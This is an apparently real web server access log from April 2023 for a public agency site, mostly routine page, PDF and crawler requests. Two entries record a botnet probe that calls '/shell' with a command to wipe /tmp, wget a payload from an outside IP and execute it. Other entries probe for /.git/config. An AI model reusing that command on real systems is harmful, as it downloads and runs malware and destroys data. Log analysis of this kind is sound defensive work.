172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [08/Apr/2023:11:35:24 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [08/Apr/2023:11:35:26 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
216.245.221.92 - - [08/Apr/2023:11:35:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:11:35:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1136&usuario=&sector=&fecha=2015&resuelve= HTTP/1.1" 200 1084
172.22.2.4 - - [08/Apr/2023:11:35:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60876
201.245.192.253 - - [08/Apr/2023:11:36:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
69.63.184.4 - - [08/Apr/2023:11:38:04 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
66.249.70.207 - - [08/Apr/2023:11:38:06 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:11:36:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.184.117 - - [08/Apr/2023:11:38:17 -0500] "GET /images/atencion-al-ciudadano-abril.jpg HTTP/1.1" 200 116523
172.22.2.4 - - [08/Apr/2023:11:37:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
201.245.192.253 - - [08/Apr/2023:11:40:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41043
201.245.192.253 - - [08/Apr/2023:11:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42988
162.55.175.143 - - [08/Apr/2023:11:40:26 -0500] "GET / HTTP/1.1" 200 319
162.55.175.143 - - [08/Apr/2023:11:40:28 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [08/Apr/2023:11:40:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:11:42:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
69.63.184.2 - - [08/Apr/2023:11:44:02 -0500] "GET /images/Fauna-silvestre-jornada-sensibilizacion-semana-santa.jpeg HTTP/1.1" 200 50019
172.22.2.4 - - [08/Apr/2023:11:42:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
222.12.74.69 - - [08/Apr/2023:11:44:35 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [08/Apr/2023:11:43:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
216.245.221.92 - - [08/Apr/2023:11:45:30 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.215 - - [08/Apr/2023:11:46:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3310.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Apr/2023:11:47:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
66.249.70.207 - - [08/Apr/2023:11:47:26 -0500] "-" 408 -
200.8.121.62 - - [08/Apr/2023:11:48:34 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
200.8.121.60 - - [08/Apr/2023:11:48:34 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.8.121.60 - - [08/Apr/2023:11:48:34 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.102.65.129 - - [08/Apr/2023:11:49:35 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX199UFB62/ZFoGmgIM8apQYYgL+nntjuNzd1atVVWzAmcXE265cn/Hw/&y=U2FsdGVkX19NbNeiXu6NI9mZZmGTF11SWy/V09AFqJteL3W1d63c+umbSiuak9+p HTTP/1.1" 200 30
186.102.65.129 - - [08/Apr/2023:11:49:36 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+2HLsDaya0/PiuhE+68W4l/fV3iCZw533VPq6cjV4I3v/ItXdEIW6B7YN7M7vtMcVsJnyf2ERZZI6EtnKiWLuWpuExUATxw2U=&u=U2FsdGVkX1+v4blvHBIzDm3HvvKxm6Pqc3U3GHQwZ3I=&y=U2FsdGVkX19NbNeiXu6NI9mZZmGTF11SWy/V09AFqJteL3W1d63c+umbSiuak9+p HTTP/1.1" 200 97
186.102.65.129 - - [08/Apr/2023:11:49:36 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19km28UVCwkCCfu1yceF7pogMA9yaZyHvnR5jlLT0b8lxf6SBUDcQDcaDhToj1J1YShqR7ByxIQjp9fFUInc5FkDsH58mDKTDUh3cJPt8lR+/xOiRzOSmSybdkOAjadRup75t92FjGPuy6R63kiaGDGUPBSe9IWF8phFUcz641BzV3WHfcirE06dqn/e8+sr4T7Nj75XjQVmBcQXJX0gknMYV3jOL+CqF3nd0JsJnSXxTie831HYuTNG3GBFljhHlIsdMTwsLXgvr/OKuKWGr6C+s3kcrUumyxIlkS2F1WLh9nKLAbSCic75WfytU13yDyuSP1tQ/tSKvJZUKz1Hda7NIAHKtwx6jMcp7auXJKjotjUjkjskLfnbLVTyyzowD8Rt5tWO2zzUvNVrxvFu3o3LIDe3gXFkCdlt0fQ1+EpyuFMK28YsZ0ydlRoztU6Xl8QPVqHKHyD7LTvrSkig16OsUov7UptoEY4AapYpAbwcGy9ZFovc59EGKA9JHop/zO0EjRvnTVHOKergK2JwEf9Q4e8GV57Oin01Lx9uwXhpDIo3+NhUM2PeLDde0js1T4sVIVk8ng/wOvMDvpY1W/4WHXv4q+aL+T5hetasy7IBGOOsLG1sPOVDkIYmDE5kjelrHPXO1zA6F8Bwv4EhunzEevOykHjyv/uLflR2jC35AFgDAR7QBUZNUJSi2TMdaQDI/vKernyqPe81uCjBgCIlmZz3/pHjHX1+z4S1bZMyF+dpXOYKenwxlx48Up7UJdNp/GLXxrqjSOy0hQymrCppaeUlgd9ED/msdFLiKf7SI17DlrAWrD1IXczsCytco8ut2pMrmgokm61T8oVMEGLW8vItSkLOjpftz5gfSiLfwzGpVcF/z/CXBjxz5udBf/eHMZ4prrLap4F8KRyZNeqff+/Kvn0MgumFMhEspaSSs7StX9WD5iCa+3aNT7yRqTjPbBIIwfAeUiIExmmpFhXnhiLYkz+OzJIRMIKapOOlc/AahAG0hBfq7v9y2Gun/IvtSHNd6tw3MqfR+f6CG33+ek+CsTdSJXqDQjtPrMFQ0wvW5IxvCLRmKtpuq9ImXvhJEUO7d9liNva1Rm1ktAJISGKjGvKniKv8qBFX+DbqpWtrGmtqqeqza6Udq/A8NgzIQh1eekdbfNJDSecmCBfb5it3BcKMbLSp2xmd7TRcf3WI8yFF1ZHq8Xv1c+4hg3s1KzFp9ECJ0frefpcoWgd7Uew5pwzRKaTbOfVuzNq9d6QG8wlneTk3ZDpWNOLgN7NYySlk5WYLOBW7MuGO/Cu5ZGNUcZu0G+o3rliVkMKyXAaLt4eE2bSwD1+4ihijRH6Jgo4MJqq8jZfxb5gL3sgT5ub+NhG/XTGUeOWRUz0imf5mPS1IXxP0pkIYQS8DvxSH+04xroVNkAviObsAcu7OB2xh3g5v3A=&u=U2FsdGVkX1+v4blvHBIzDm3HvvKxm6Pqc3U3GHQwZ3I=&y=U2FsdGVkX19NbNeiXu6NI9mZZmGTF11SWy/V09AFqJteL3W1d63c+umbSiuak9+p HTTP/1.1" 200 368
186.102.65.129 - - [08/Apr/2023:11:49:36 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/s/V0qOitsvWree4HJW9ofv7RiOxe/Hy+dARYL49iA89er2788ruCxHC0G3zEzrrao0TeM5CTxhRxd+HXhmdmIf5i+MBPEtARscvSULHRuAHBwprs/6Wr4BevPGlZZpgiBOJB6H0n6IFEkuFmpqMvDfg9zAsakAd+cVzXd70wsoyQ3yUhcByuUGqOkxLXHlssmE89QY5D62Gt73QR7VaTmF7yhTwRu79a+bfOZCLz5nB4qITWgpMd8ouFVhCiGIcgMQiyWdYK/oLOriGCUzAPjUAUwfWyKPjIJGTR9KfbhbEFB8NGzoLDycAejyC6Hd+Jx9PJUTgMq8sDE6D7+Mjj523/BnXFFK28=&u=U2FsdGVkX1+v4blvHBIzDm3HvvKxm6Pqc3U3GHQwZ3I=&y=U2FsdGVkX19NbNeiXu6NI9mZZmGTF11SWy/V09AFqJteL3W1d63c+umbSiuak9+p HTTP/1.1" 200 196
186.102.65.129 - - [08/Apr/2023:11:49:36 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX199UFB62/ZFoGmgIM8apQYYgL+nntjuNzd1atVVWzAmcXE265cn/Hw/ HTTP/1.1" 200 31032
172.22.2.4 - - [08/Apr/2023:11:48:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Apr/2023:11:50:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:11:49:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
168.119.49.52 - - [08/Apr/2023:11:51:46 -0500] "GET / HTTP/1.1" 200 319
168.119.49.52 - - [08/Apr/2023:11:51:46 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [08/Apr/2023:11:51:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
222.12.38.178 - - [08/Apr/2023:11:52:18 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
66.249.70.207 - - [08/Apr/2023:11:54:08 -0500] "-" 408 -
157.55.39.218 - - [08/Apr/2023:11:55:04 -0500] "GET /BLA/resoluciones/AUTOS%202018/6637.pdf HTTP/1.1" 200 247589
216.245.221.92 - - [08/Apr/2023:11:55:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:11:54:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.246 - - [08/Apr/2023:11:55:46 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [08/Apr/2023:11:54:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
201.245.192.253 - - [08/Apr/2023:11:56:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
69.63.184.116 - - [08/Apr/2023:11:57:43 -0500] "GET /images/atencion-al-ciudadano-abril.jpg HTTP/1.1" 200 116523
216.245.221.92 - - [08/Apr/2023:12:00:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.207 - - [08/Apr/2023:12:01:19 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:11:59:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:12:01:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:12:00:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
193.32.162.159 - - [08/Apr/2023:12:03:51 -0500] "GET / HTTP/1.1" 200 319
193.32.162.159 - - [08/Apr/2023:12:04:01 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
216.245.221.92 - - [08/Apr/2023:12:05:30 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.4 - - [08/Apr/2023:12:06:03 -0500] "GET /images/Fauna-silvestre-jornada-sensibilizacion-semana-santa.jpeg HTTP/1.1" 200 50019
201.245.192.253 - - [08/Apr/2023:12:06:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:12:05:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:06:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
64.62.243.165 - - [08/Apr/2023:12:08:43 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [08/Apr/2023:12:07:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
216.245.221.92 - - [08/Apr/2023:12:10:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.207 - - [08/Apr/2023:12:10:46 -0500] "-" 408 -
173.252.95.112 - - [08/Apr/2023:12:10:51 -0500] "GET /ascenso-tecnologico-distrito-firma-decreto-que-permitira-renovar-parte-de-los-vehiculos-de-carga-y-asi-reducir-emisiones-contaminantes.html HTTP/1.1" 206 1058
201.245.192.253 - - [08/Apr/2023:12:11:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:12:11:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:12:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
66.249.70.172 - - [08/Apr/2023:12:14:04 -0500] "-" 408 -
216.245.221.92 - - [08/Apr/2023:12:15:30 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.141 - - [08/Apr/2023:12:15:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0055.pdf HTTP/1.1" 200 2829012
52.167.144.76 - - [08/Apr/2023:12:16:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/3927.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Apr/2023:12:16:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
157.55.39.215 - - [08/Apr/2023:12:18:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0442.pdf HTTP/1.1" 304 -
66.249.70.207 - - [08/Apr/2023:12:18:44 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:12:17:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:18:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
201.245.192.253 - - [08/Apr/2023:12:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43155
201.245.192.253 - - [08/Apr/2023:12:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42970
40.77.167.141 - - [08/Apr/2023:12:20:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5641.pdf HTTP/1.1" 200 398321
69.171.231.5 - - [08/Apr/2023:12:20:26 -0500] "GET /images/incautan-animales-semana-santa-2023.jpeg HTTP/1.1" 200 36611
216.245.221.92 - - [08/Apr/2023:12:20:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [08/Apr/2023:12:21:04 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [08/Apr/2023:12:21:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [08/Apr/2023:12:21:06 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [08/Apr/2023:12:21:06 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [08/Apr/2023:12:21:06 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [08/Apr/2023:12:21:06 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [08/Apr/2023:12:21:06 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [08/Apr/2023:12:21:06 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [08/Apr/2023:12:21:07 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [08/Apr/2023:12:21:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [08/Apr/2023:12:21:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:12:22:06 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3598&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 626
69.171.231.5 - - [08/Apr/2023:12:24:13 -0500] "GET /images/incautan-animales-semana-santa-2023.jpeg HTTP/1.1" 200 36611
172.22.2.4 - - [08/Apr/2023:12:23:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Apr/2023:12:25:30 -0500] "HEAD / HTTP/1.1" 200 -
35.204.221.1 - - [08/Apr/2023:12:25:40 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [08/Apr/2023:12:24:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [08/Apr/2023:12:26:46 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [08/Apr/2023:12:26:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:12:28:27 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 200 660637
179.43.177.242 - - [08/Apr/2023:12:29:07 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [08/Apr/2023:12:30:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43155
201.245.192.253 - - [08/Apr/2023:12:30:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42970
216.245.221.92 - - [08/Apr/2023:12:30:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:29:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:29:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [08/Apr/2023:12:31:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
92.118.39.109 - - [08/Apr/2023:12:33:10 -0500] "GET /.git/config HTTP/1.1" 404 1018
216.245.221.92 - - [08/Apr/2023:12:35:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:34:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:12:36:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:12:35:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
52.167.144.89 - - [08/Apr/2023:12:38:15 -0500] "GET /bla/resoluciones/autos%202021/2048.pdf HTTP/1.1" 200 362011
52.188.77.43 - - [08/Apr/2023:12:39:01 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
40.77.167.231 - - [08/Apr/2023:12:39:23 -0500] "GET /bla/resoluciones/autos%202014/6717.pdf HTTP/1.1" 200 536009
201.245.192.253 - - [08/Apr/2023:12:40:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43155
201.245.192.253 - - [08/Apr/2023:12:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42970
40.77.167.231 - - [08/Apr/2023:12:40:24 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 274667
216.245.221.92 - - [08/Apr/2023:12:40:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.207 - - [08/Apr/2023:12:40:48 -0500] "-" 408 -
201.245.192.253 - - [08/Apr/2023:12:41:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:12:40:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:41:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
216.245.221.92 - - [08/Apr/2023:12:45:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:12:46:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
52.167.144.60 - - [08/Apr/2023:12:47:05 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.246 - - [08/Apr/2023:12:47:19 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
40.77.167.246 - - [08/Apr/2023:12:47:19 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
40.77.167.186 - - [08/Apr/2023:12:47:23 -0500] "GET /js/url.js HTTP/1.1" 404 1034
157.55.39.209 - - [08/Apr/2023:12:47:24 -0500] "GET /css/style.css HTTP/1.1" 200 3473
157.55.39.209 - - [08/Apr/2023:12:47:24 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
157.55.39.209 - - [08/Apr/2023:12:47:25 -0500] "GET /css/style.css HTTP/1.1" 200 3473
157.55.39.209 - - [08/Apr/2023:12:47:25 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
40.77.167.186 - - [08/Apr/2023:12:47:33 -0500] "GET /js/url.js HTTP/1.1" 404 1034
172.22.2.4 - - [08/Apr/2023:12:46:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:12:47:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
216.245.221.92 - - [08/Apr/2023:12:50:30 -0500] "HEAD / HTTP/1.1" 200 -
173.252.111.5 - - [08/Apr/2023:12:51:14 -0500] "GET /images/energia-eficiencia-26-mayo.jpg HTTP/1.1" 200 46417
69.171.251.1 - - [08/Apr/2023:12:51:19 -0500] "GET /images/negocios-verdes-3-marzo.jpg HTTP/1.1" 200 33179
173.252.95.7 - - [08/Apr/2023:12:51:25 -0500] "GET /si-estas-buscando-productos-y-servicios-sostenibles-participa-en-la-feria-de-negocios-verdes-en-bogota.html HTTP/1.1" 206 996
201.245.192.253 - - [08/Apr/2023:12:51:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:12:51:56 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [08/Apr/2023:12:51:56 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [08/Apr/2023:12:51:56 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [08/Apr/2023:12:51:56 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [08/Apr/2023:12:51:57 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [08/Apr/2023:12:51:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
172.22.2.4 - - [08/Apr/2023:12:52:45 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3241&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1065
172.22.2.4 - - [08/Apr/2023:12:52:45 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
